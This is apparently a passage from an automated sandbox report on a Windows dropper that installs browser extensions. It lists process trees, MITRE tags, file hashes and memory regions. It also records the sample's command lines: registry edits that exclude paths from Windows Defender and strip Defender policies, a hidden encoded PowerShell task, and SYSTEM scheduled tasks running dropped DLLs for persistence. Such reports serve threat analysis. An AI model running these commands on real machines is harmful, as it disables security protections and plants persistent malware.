                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dwSOvWKysCpEXQRJ" /t REG_DWORD /d 0 /reg:64
                                                        4⤵
                                                          PID:1992
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /CREATE /TN "gPMbLtAjJ" /SC once /ST 09:12:24 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Scheduled Task/Job: Scheduled Task
                                                        PID:1564
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /run /I /tn "gPMbLtAjJ"
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:2696
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /DELETE /F /TN "gPMbLtAjJ"
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:2784
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:680
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                          4⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:872
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                        3⤵
                                                          PID:2708
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                            4⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:1560
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /CREATE /TN "nWibDlWEYQvBMTcbY" /SC once /ST 00:57:53 /RU "SYSTEM" /TR "\"C:\Windows\Temp\dwSOvWKysCpEXQRJ\LHRQGZHOzQUOick\JWGWblk.exe\" dH /site_id 525403 /S" /V1 /F
                                                          3⤵
                                                          • Drops file in Windows directory
                                                          • System Location Discovery: System Language Discovery
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:2772
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /run /I /tn "nWibDlWEYQvBMTcbY"
                                                          3⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:2228
                                                      • C:\Windows\Temp\dwSOvWKysCpEXQRJ\LHRQGZHOzQUOick\JWGWblk.exe
                                                        C:\Windows\Temp\dwSOvWKysCpEXQRJ\LHRQGZHOzQUOick\JWGWblk.exe dH /site_id 525403 /S
                                                        2⤵
                                                        • Checks computer location settings
                                                        • Executes dropped EXE
                                                        • Drops Chrome extension
                                                        • Drops file in System32 directory
                                                        • Drops file in Program Files directory
                                                        • System Location Discovery: System Language Discovery
                                                        • Modifies data under HKEY_USERS
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:1012
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /DELETE /F /TN "bIqjSKjLtvGhSJBNfA"
                                                          3⤵
                                                            PID:1416
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                            3⤵
                                                              PID:2976
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                4⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2012
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:1764
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                4⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2532
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\CbVqBnigU\UXaudO.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "bztBruNizUuNfHs" /V1 /F
                                                              3⤵
                                                              • Drops file in Windows directory
                                                              • System Location Discovery: System Language Discovery
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:2736
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks /CREATE /TN "bztBruNizUuNfHs2" /F /xml "C:\Program Files (x86)\CbVqBnigU\oNDKTkE.xml" /RU "SYSTEM"
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:2616
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks /END /TN "bztBruNizUuNfHs"
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2120
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks /DELETE /F /TN "bztBruNizUuNfHs"
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:1168
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks /CREATE /TN "hpWLSRGERLRKoG" /F /xml "C:\Program Files (x86)\LfKWeIlHqQBU2\fgYidOq.xml" /RU "SYSTEM"
                                                              3⤵
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:2608
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks /CREATE /TN "pWIwWZcWAJruX2" /F /xml "C:\ProgramData\TUiypwAeSPRUPoVB\FImPRqF.xml" /RU "SYSTEM"
                                                              3⤵
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:2804
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks /CREATE /TN "jOUdPvOmNcXjfFJDH2" /F /xml "C:\Program Files (x86)\xQNizQXsNpkyKPuIghR\VZjJGmy.xml" /RU "SYSTEM"
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:1704
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks /CREATE /TN "OVRxarSquweWmEViUFO2" /F /xml "C:\Program Files (x86)\ardKySDqUVkhC\GEPGIym.xml" /RU "SYSTEM"
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:1672
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks /CREATE /TN "AYwEeuzLnMnSOnskF" /SC once /ST 05:47:44 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\dwSOvWKysCpEXQRJ\SafWZrBI\aZPrjye.dll\",#1 /site_id 525403" /V1 /F
                                                              3⤵
                                                              • Drops file in Windows directory
                                                              • System Location Discovery: System Language Discovery
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:1288
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks /run /I /tn "AYwEeuzLnMnSOnskF"
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3052
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:856
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                4⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2448
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:928
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                4⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:1852
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks /DELETE /F /TN "nWibDlWEYQvBMTcbY"
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2816
                                                          • C:\Windows\system32\rundll32.EXE
                                                            C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\dwSOvWKysCpEXQRJ\SafWZrBI\aZPrjye.dll",#1 /site_id 525403
                                                            2⤵
                                                              PID:2352
                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\dwSOvWKysCpEXQRJ\SafWZrBI\aZPrjye.dll",#1 /site_id 525403
                                                                3⤵
                                                                • Blocklisted process makes network request
                                                                • Checks BIOS information in registry
                                                                • Loads dropped DLL
                                                                • Drops file in System32 directory
                                                                • Enumerates system info in registry
                                                                • Modifies data under HKEY_USERS
                                                                PID:2708
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /DELETE /F /TN "AYwEeuzLnMnSOnskF"
                                                                  4⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2856
                                                          • C:\Windows\system32\gpscript.exe
                                                            gpscript.exe /RefreshSystemParam
                                                            1⤵
                                                              PID:2340
                                                            • C:\Windows\system32\gpscript.exe
                                                              gpscript.exe /RefreshSystemParam
                                                              1⤵
                                                                PID:3024
                                                              • C:\Windows\system32\gpscript.exe
                                                                gpscript.exe /RefreshSystemParam
                                                                1⤵
                                                                  PID:2232

                                                                Network

                                                                MITRE ATT&CK Enterprise v15

                                                                Replay Monitor

                                                                Loading Replay Monitor...

                                                                Downloads

                                                                • C:\Program Files (x86)\CbVqBnigU\oNDKTkE.xml

                                                                  Filesize

                                                                  2KB

                                                                  MD5

                                                                  4604ea5692736cc15e504a8c2c62ed24

                                                                  SHA1

                                                                  2832425eaf764213a7386d9bdcc8cca7aa5d6b9b

                                                                  SHA256

                                                                  eb46ae13bf6ef9fef67687581568c307ccb51c2b7b0f33d29caec191f9286a24

                                                                  SHA512

                                                                  c5a65eb4f30bbc1807af5c4fe77a4aade07dd648dc0480768844fb87fef3ca43b96ed96a06c44dfe6d8b9c7720093aa562d0756333f3fba15167d75f01e09590

                                                                • C:\Program Files (x86)\LfKWeIlHqQBU2\fgYidOq.xml

                                                                  Filesize

                                                                  2KB

                                                                  MD5

                                                                  0fa5034e062b63b03e5ac64d908a9ab4

                                                                  SHA1

                                                                  19da1971761619edbbb730260717e86885b3ee65

                                                                  SHA256

                                                                  8a5d30bbe20ca49206076044598e4a0156b5390cd2425a436075a256548d251a

                                                                  SHA512

                                                                  b6f57b4860aad91e08b8a271772cdbe803b2886aaff722d17ff66f2cca89ad16aca8e3ac3b637479d0b605dd571d8cc720c44f19d19ee1c2b595795324daff33

                                                                • C:\Program Files (x86)\ardKySDqUVkhC\GEPGIym.xml

                                                                  Filesize

                                                                  2KB

                                                                  MD5

                                                                  51a363467467901584b9a9cbcec8391f

                                                                  SHA1

                                                                  94547a830c4d6d1badd637a0f715f91f35ce9567

                                                                  SHA256

                                                                  a1a77b7fcaa2a99d530d7de3b9118990261238889c57af3c4f53ec11823a9f58

                                                                  SHA512

                                                                  1a53da0b354bb49e5c39142c6e342986d60537d1b059ca28b9e46d62b5e64a9f711e7287ff70e8609d6a2e90284bcb6bbe281b6f997de55b50a5fb63f09ea02a

                                                                • C:\Program Files (x86)\xQNizQXsNpkyKPuIghR\VZjJGmy.xml

                                                                  Filesize

                                                                  2KB

                                                                  MD5

                                                                  f84d5f1f3bab06f434b71a88d085dc5d

                                                                  SHA1

                                                                  9c5db3d0d5b958a1281c0d2c95a945ac9e876457

                                                                  SHA256

                                                                  a7167e0e0018789a53d7162af2e381e5a80d7fe97bc44265cd720f8f2a266aca

                                                                  SHA512

                                                                  3f3d3866694f4caeeb1540970d31e40e89d959e54063f7ef9cea0081b674dd1f294d14134c954b803e33a479cc7849e87cb6f881733910960acda9c5e49e889f

                                                                • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                                  Filesize

                                                                  1.2MB

                                                                  MD5

                                                                  b7ef040db57e3d4869088f03304cc7b1

                                                                  SHA1

                                                                  c03e37d4e7f9086a01d9b5f6e7fd32a9c8ef58c9

                                                                  SHA256

                                                                  c9bee3b1340f8d391dea189c52687caf81d7c7a649d8ab0de1e340a3ccd06415

                                                                  SHA512

                                                                  8b0add5f9c8e3cd196ec64abdb3bec6d777fb40176ec64a05065d30cbd3d721c9420d156027eab361a72e448ee6144d89727c61b519f10b83c363d76677e94f3

                                                                • C:\ProgramData\TUiypwAeSPRUPoVB\FImPRqF.xml

                                                                  Filesize

                                                                  2KB

                                                                  MD5

                                                                  56155349c87e1f799c38022913e2e45d

                                                                  SHA1

                                                                  2bb5cc77703fa3689acded88732601ad2c62b1a4

                                                                  SHA256

                                                                  fd2cd38bc9b3973933131e5a55c589b9788d9c3601cc53729066b0747ce5173e

                                                                  SHA512

                                                                  3ea62e19596aadc7b2dca5ea51fd18e19cfe0af7a61774b765c19b6609e935bbeaafa8253293579d257a5a26db8fcbd84e6144b118e560af6358345ccdf3069e

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

                                                                  Filesize

                                                                  187B

                                                                  MD5

                                                                  2a1e12a4811892d95962998e184399d8

                                                                  SHA1

                                                                  55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                  SHA256

                                                                  32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                  SHA512

                                                                  bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

                                                                  Filesize

                                                                  136B

                                                                  MD5

                                                                  238d2612f510ea51d0d3eaa09e7136b1

                                                                  SHA1

                                                                  0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                  SHA256

                                                                  801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                  SHA512

                                                                  2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

                                                                  Filesize

                                                                  150B

                                                                  MD5

                                                                  0b1cf3deab325f8987f2ee31c6afc8ea

                                                                  SHA1

                                                                  6a51537cef82143d3d768759b21598542d683904

                                                                  SHA256

                                                                  0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                  SHA512

                                                                  5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                  Filesize

                                                                  10KB

                                                                  MD5

                                                                  18deaed74b2c1199237aa56467e770cd

                                                                  SHA1

                                                                  0e500549a765afb9f6fb7168707f0d45cf4cce30

                                                                  SHA256

                                                                  f1b2fcd8d1fd927a7c607b54cc40a2042154eb67d11601533f38ab5bdbcd6aaa

                                                                  SHA512

                                                                  b1e2a2adbbe9aff67992935b576c3839b4cb00f2d397be6add55613709402a6609a45b5dae3383765e62555dd3b5876a635b926b655001255f58a62fa31b8ec4

                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                  Filesize

                                                                  7KB

                                                                  MD5

                                                                  4b6c4ad64820224afa8ec0b931a49e24

                                                                  SHA1

                                                                  ce40e09005492e3497f3f119342abd842a9f53e3

                                                                  SHA256

                                                                  310aa5f49db67a92962a0332518d9e3cb54a1d1b575746955955bff10bbcf7d1

                                                                  SHA512

                                                                  e2cefca5d75f2176c50603831b46506f0bed73f974b49184004bcee0a9f14aa5c7da86eaea4e2d4f64c0939d98c52268a943fabd798a8d5b10cd20ac8aa24eb7

                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                  Filesize

                                                                  7KB

                                                                  MD5

                                                                  8fcc9163f5b844d22ecfe955388f4197

                                                                  SHA1

                                                                  ae0768d0fa9d63c77ace585235e4fda0aa6f305c

                                                                  SHA256

                                                                  c2e315966ee31b13e3fa12daf3f825e46aca01ff1644f064ad4201496f476602

                                                                  SHA512

                                                                  18ae1981f1fdf17efb5520c631bfcdaa25774bce9af36bea31ba176a8bc2fb44875d2470f9aa3cb21fa2c67e275c38c1c8f5addc1aad353805b889df8649631d

                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                  Filesize

                                                                  7KB

                                                                  MD5

                                                                  97d901c876325e17f7b75c673c163a86

                                                                  SHA1

                                                                  04915eebd54aa295d97d67427837c7277ebdc5fc

                                                                  SHA256

                                                                  682efaf139e6b787bf7e7985b01cb8767f5d20ade218681cdb5573f26dd248cc

                                                                  SHA512

                                                                  9ad9415f8184809abed31288c79af20025b91a2365d2dcaa83d6f0bb5e07bf2f29027f64d0b3b1022083cb46e6b3007fce0fcc5beaaf013b592b13b5e2092eed

                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\prefs.js

                                                                  Filesize

                                                                  7KB

                                                                  MD5

                                                                  174fd2c19be9e73e21fff9a1013b53a7

                                                                  SHA1

                                                                  a40a65934d3a8755f485c8f6972b8bd0b46e7766

                                                                  SHA256

                                                                  aee4d712803fc6c501a74c7a31abdb42ffe8e5e8d14f269463baa98c9f34ab9c

                                                                  SHA512

                                                                  ab40cc89220492f99bcf9857289dfc2945e912d2dcb1b1ffdbcfa0c3c59252a54b412e5f33e15a1e4c2d44b52bf2890cbf0f4a904420762de7ea4a858b28aa99

                                                                • C:\Windows\Temp\dwSOvWKysCpEXQRJ\CFGUGlwq\JNJdrPykbGfDMCMr.wsf

                                                                  Filesize

                                                                  9KB

                                                                  MD5

                                                                  052393884a653df4509d54a271bcb2c9

                                                                  SHA1

                                                                  0615f67000bcb00fdf7cc8db1f44063c78e02231

                                                                  SHA256

                                                                  cfda4650f3f106d8a0cadb382783e77bbd4db04275ee596e722e5c0d681f5a4f

                                                                  SHA512

                                                                  1abc66f59d52bbd60ff90d50f329c1cd24264c5813c94d62aca5b03c4fb218bf4ece87d40d498709f399d316a93377bc16ef3b3c68852e56869af48ace878764

                                                                • C:\Windows\Temp\dwSOvWKysCpEXQRJ\SafWZrBI\aZPrjye.dll

                                                                  Filesize

                                                                  6.2MB

                                                                  MD5

                                                                  2f3c4a81976f25cafaee10ffa098251e

                                                                  SHA1

                                                                  b0b9035e59a4c3f594d459bd69bb024eab6dc15d

                                                                  SHA256

                                                                  d411a53bc52ccc475bf2e851c943e8653a22e93c3e9fcc029f1c29a7161e45f4

                                                                  SHA512

                                                                  c1910203ef4bb3c74e3b150ac81273fb0ae8abdac349af128343324c9b7b9f602dbd8dc66524724904499df53bea1fc147dcb5d9198961fd2b669225d768fdcc

                                                                • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                  Filesize

                                                                  5KB

                                                                  MD5

                                                                  11eb75d92a3154ac133241b5e0cded31

                                                                  SHA1

                                                                  6b908576bea0f42fb4a31e39f617289d72091038

                                                                  SHA256

                                                                  cbd839c8a44dc160e674d0e62828f7095308826b04684543ff62266556f58659

                                                                  SHA512

                                                                  192dba903e88f4ad9bccf6f9251c6045f3a12b81c33857147a9641b335faa0d4840146fecbff1452e31653f5099a77d605591631bf10ab20483c0bc91b87b439

                                                                • C:\Windows\system32\GroupPolicy\gpt.ini

                                                                  Filesize

                                                                  268B

                                                                  MD5

                                                                  a62ce44a33f1c05fc2d340ea0ca118a4

                                                                  SHA1

                                                                  1f03eb4716015528f3de7f7674532c1345b2717d

                                                                  SHA256

                                                                  9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

                                                                  SHA512

                                                                  9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

                                                                • \Users\Admin\AppData\Local\Temp\7zSF41F.tmp\Install.exe

                                                                  Filesize

                                                                  6.3MB

                                                                  MD5

                                                                  bbab6c52e9c95497cbd7807827f98dec

                                                                  SHA1

                                                                  b3688d1fd87bbac50d6b129d28d13bf017bb2e08

                                                                  SHA256

                                                                  38249f277c58596f557a93ba453ab7677c11ff58ebd01f40eecfedc5be94fa0a

                                                                  SHA512

                                                                  59f7472a0e1405cae428b06da76a5feaaa77a908bf2b58cba604fd691c3add9140ddeeaec890e00bc622a5b3b1fb0f9f91a9d14fcae348e16b87430062a96782

                                                                • \Users\Admin\AppData\Local\Temp\7zSF631.tmp\Install.exe

                                                                  Filesize

                                                                  6.8MB

                                                                  MD5

                                                                  37785831780e9113d8ca1266ce065025

                                                                  SHA1

                                                                  d983a3a3c4aa277fc22cbf223f4b8f085f0d8ea8

                                                                  SHA256

                                                                  093fa153cdeb2c77ce754e1ad44ef4a4eb8db2e5670b9e631130924fc2e20c8e

                                                                  SHA512

                                                                  6ebdd08b4bf8d2ff23061256226cd7a539b5ade27cc8af098b3605eff9d36c80238c5195fdc6836b01fb231537943b77856fc0e30d66006ccbc0c73cd3960ce8

                                                                • memory/1012-86-0x0000000004560000-0x00000000045E5000-memory.dmp

                                                                  Filesize

                                                                  532KB

                                                                • memory/1012-288-0x0000000004FF0000-0x0000000005065000-memory.dmp

                                                                  Filesize

                                                                  468KB

                                                                • memory/1012-119-0x0000000004800000-0x0000000004863000-memory.dmp

                                                                  Filesize

                                                                  396KB

                                                                • memory/1012-302-0x0000000005230000-0x00000000052E6000-memory.dmp

                                                                  Filesize

                                                                  728KB

                                                                • memory/1304-59-0x000000001B880000-0x000000001BB62000-memory.dmp

                                                                  Filesize

                                                                  2.9MB

                                                                • memory/1304-60-0x0000000001C80000-0x0000000001C88000-memory.dmp

                                                                  Filesize

                                                                  32KB

                                                                • memory/1608-49-0x0000000001F70000-0x0000000001F78000-memory.dmp

                                                                  Filesize

                                                                  32KB

                                                                • memory/1608-48-0x000000001B720000-0x000000001BA02000-memory.dmp

                                                                  Filesize

                                                                  2.9MB

                                                                • memory/2708-322-0x0000000001600000-0x0000000002600000-memory.dmp

                                                                  Filesize

                                                                  16.0MB

                                                                • memory/2956-22-0x0000000010000000-0x0000000011000000-memory.dmp

                                                                  Filesize

                                                                  16.0MB

                                                                • memory/3020-31-0x0000000002870000-0x0000000002878000-memory.dmp

                                                                  Filesize

                                                                  32KB

                                                                • memory/3020-30-0x000000001B690000-0x000000001B972000-memory.dmp

                                                                  Filesize

                                                                  2.9MB